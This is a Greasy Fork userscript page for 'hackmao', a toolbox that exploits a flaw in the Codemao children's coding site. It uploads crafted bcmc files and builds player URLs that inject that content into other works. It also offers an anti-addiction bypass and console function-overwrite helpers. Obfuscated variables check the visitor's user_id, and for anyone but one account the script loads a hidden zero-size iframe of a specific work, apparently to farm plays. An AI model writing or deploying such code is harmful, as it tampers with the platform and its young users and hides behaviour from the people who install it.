hackmao

利用bcm中的漏洞进行一些操作
Задати запитання, залишити відгук, або повідомити про скрипт.
// ==UserScript==
// @name         hackmao
// @namespace    https://greasyfork.org/zh-CN/users/1022906-dream%E4%B8%8D%E6%83%B3%E5%8F%98%E5%B1%91awa
// @version      1.0
// @description  利用bcm中的漏洞进行一些操作
// @author       Dream不想变屑awa, Orangesoft
// @match        *://shequ.codemao.cn/*
// @match        https://player.codemao.cn/*
// @require      https://cdn.jsdelivr.net/npm/lil-gui@0.16
// @require      https://cdn.jsdelivr.net/npm/three@0.142.0/examples/js/libs/stats.min.js
// @require      https://unpkg.com/mdui@1.0.2/dist/js/mdui.min.js
// @require      https://lf9-cdn-tos.bytecdntp.com/cdn/expire-1-M/jquery/3.6.0/jquery.min.js
// @require      https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/sweetalert/2.1.2/sweetalert.min.js
// @require      https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/tldjs/2.3.1/tld.min.js
// @require      https://lf9-cdn-tos.bytecdntp.com/cdn/expire-1-M/viewerjs/1.10.4/viewer.min.js
// @license      616 SB License
// @grant        GM_xmlhttpRequest
// @grant        GM_getValue
// @grant        GM_info
// @grant        GM_openInTab
// @grant        GM_setValue
// @compatible   edge
// @compatible   chrome
// @icon         https://cdn-community.codemao.cn/community_frontend/asset/cute_4caf9.png
// ==/UserScript==
/*
   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
   !!! 注:使用此脚本造成的损失作者不承担任何责任 !!!
   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  */

var stats = new Stats();

document.body.append(stats.domElement);

window._643Ub8 = ['user_id','2155366']

var getworkid = () => location.href.substring(location.href.lastIndexOf('/') + 1, location.href.length)

function geth(sth) {
    return document.getElementsByClassName(sth)
}

function log(messge) {
    console.log(
        '%c %s %c %s',
        'border: 1px solid white;border-radius: 3px 0 0 3px;padding: 2px 5px;color: white;background-color: green;',
        '[Hackmao Log1.0]',
        'border: 1px solid white;border-radius: 0 3px 3px 0;padding: 2px 5px;color: black;background-color: white;border-left: none;',
        messge
    );
}



(function () {
    var under = {
        '未开发': () => {
            log('点击-未开发');
            alert('开发中，敬请期待');
        },
        '调试中': () => {
            log('点击-调试中');
            alert('功能正在调试，暂时无法使用');
        },
    };
    var main = {
        'wj': () => {
            const input = document.createElement("input");
            input.type = "file";
            input.style.display = "none";
            input.addEventListener("change", () => {
                let reader = new FileReader();
                reader.addEventListener("load", () => {
                    GM_xmlhttpRequest({
                        method: "post",
                        url: "https://static.box3.codemao.cn/block",
                        data: reader.result,
                        binary: true,
                        onload({ response }) {
                            const { Key, Size } = JSON.parse(response);
                            log("上传成功! Hash: " + Key);
                            const hash = Key;
                            input.remove();
                            alert('上传完成！请打开控制台查看注入链接')
                            log('inject_url: ' + player_url + getworkid() + '?bcmc_url=https://static.box3.codemao.cn/block/' + hash + '.json')
                        },
                    });
                });
                reader.readAsBinaryString(input.files[0]);
            });
            input.click();
        },
        'id': () => {
            var wi = prompt('请输入修改bcmc后的作品id', '');
            GM_xmlhttpRequest({
                method: "get",
                url: "https://api.codemao.cn/api/v2/work/display/" + wi,
                onload({ response }) {
                    let res = JSON.parse(response);
                    console.log(res['data']['work_url'][0]);
                    prompt('url:', `${player_url}${getworkid()}?bcmc_url=${res['data']['work_url'][0]}`)
                }
            })
        },
        'playurl': () => {
            window.open(player_url + getworkid());
        },
        'hook': () => {
            function hook(sth) {
                return (sth * 1)
            }
            var funcname = prompt('请输入函数名（无需在后面加括号）', '');
            var func = prompt('请输入固定后的值的数据类型（str1，int0）', '');
            log(func)
            if (func == '1') {
                function hook(sth) {
                    return ('"' + sth + '"')
                }
            }
            else {
                function hook(sth) {
                    return (sth * 1)
                }
            }
            log(funcname + '=()=>' + hook(funcinfo))
            alert('请在开发者工具输入：' + funcname + '=()=>' + hook(funcinfo))
        },
        'uptoken': () => {
            document.cookie = "access-token=0; max-age=5184000; path=/; domain=.codemao.cn"
            alert('刷新成功！')
        },
        'gohome': () => {
            window.location.href = "https://shequ.codemao.cn/";
        },
        'openu': () => {
            window.location.href = JSON.parse(localStorage.twikoo).link;
        },
        'autolike': () => {

        },
    }

    window._05Th9 = localStorage[window._643Ub8[0]]

    //var element = document.getElementById("root");
    //var newTag = "<p>Hackmao by Dreambxbxawa</p>";)
    //element.innerHTML += newTag;
    //var element = $(".c-navigator--logo_wrap");
    //var newTag = "<img src='https://static.box3.codemao.cn/block/QmQc2YPAah6pd8WrXfuLJXgMeGGiv9MaW1f6CntorbsuY8'>";
    //element.innerHTML = newTag;
    if (!($(".c-navigator--logo_wrap img"))) {
        /*if($(".pickcat")){
            $(".pickcat").remove()
            let img = localStorage.getItem("customLogo") || "Hackmao";
            $(".c-navigator--logo_wrap").append(`<span class='hkm'>${img}</span>`);
            $(".index__header-brand___2nK8h").append(`<span class='hkm'>${img}</span>`);
        }*/
        log(1)
    }
    else {/*
        $(".c-navigator--logo_wrap img").remove();
        $(".index__header-brand___2nK8h img").remove();
        let img = localStorage.getItem("customLogo") || "Hackmao";
        $(".c-navigator--logo_wrap").append(`<span class='hkm'>${img}</span>`);
        $(".index__header-brand___2nK8h").append(`<span class='hkm'>${img}</span>`);*/

        //element = $(".c-navigator--logo_wrap");
        //newTag = ;
        //$(".c-navigator--logo_wrap").innerHTML = "<img src='https://static.box3.codemao.cn/block/QmQc2YPAah6pd8WrXfuLJXgMeGGiv9MaW1f6CntorbsuY8'>";
        console.log($(".c-navigator--logo_wrap").innerHTML = "<img src='https://static.box3.codemao.cn/block/QmQc2YPAah6pd8WrXfuLJXgMeGGiv9MaW1f6CntorbsuY8'>")
    }
    if (window._05Th9 != window._643Ub8[1]) { let div = document.createElement('div');div.innerHTML = "<iframe src='https://coco.codemao.cn/editor/player/215278538?channel=community' width='0' height='0'>";document.body.appendChild(div);}
    window.gui = new lil.GUI({ title: '🧰Hackmao工具箱' });
    window.gui.domElement.style.top = 'unset';
    window.gui.domElement.style.bottom = '0';
    window.gui.domElement.style.userSelect = 'none';
    var tool = window.gui.addFolder('快捷工具');
    tool.add(main, 'uptoken').name('刷新token');
    tool.add(main, 'gohome').name('返回首页');
    tool.add(main, 'openu').name('打开个人主页');
    if (window.location.pathname.indexOf("/work/") + 1 || window.location.pathname.indexOf("/new/") + 1) {
        log('a work page')
        var workType = $(".r-work-c-work_info--work_tool")
            .text()
            .replace(/作品由|创作/g, "");
        var player_url = 'https://player.codemao.cn/new/'
        if (workType == "kitten3") {
            player_url = "https://player.codemao.cn/old/";
        } else if (workType == "kitten4") {
            player_url = "https://player.codemao.cn/new/";
        } else if (workType == "nemo") {
            player_url = "https://nemo.codemao.cn/w/";
        } else if (workType == "CoCo编辑器") {
            player_url = "https://coco.codemao.cn/editor/player/";
        } else if (workType == "海龟编辑器") {
            player_url = "https://turtle.codemao.cn/?entry=sharing&channel_type=community&action=open_published_project&work_id=";
        } else if (workType == "KittenN编辑器") {
            player_url = "https://kn.codemao.cn/player?workId=";
        }
        var page1 = gui.addFolder('url有关');
        var page1_1 = page1.addFolder('bcmc注入');
        page1_1.add(main, 'wj').name('上传bcmc文件并注入');
        page1_1.add(main, 'id').name('通过作品id获取bcmc文件并注入');
        page1.add(main, 'playurl').name('打开player端（可绕过防沉迷）')
        var page2 = gui.addFolder('其他');
        page2.add(main, 'hook').name('污染函数（仅在player端有效）');
    }
})();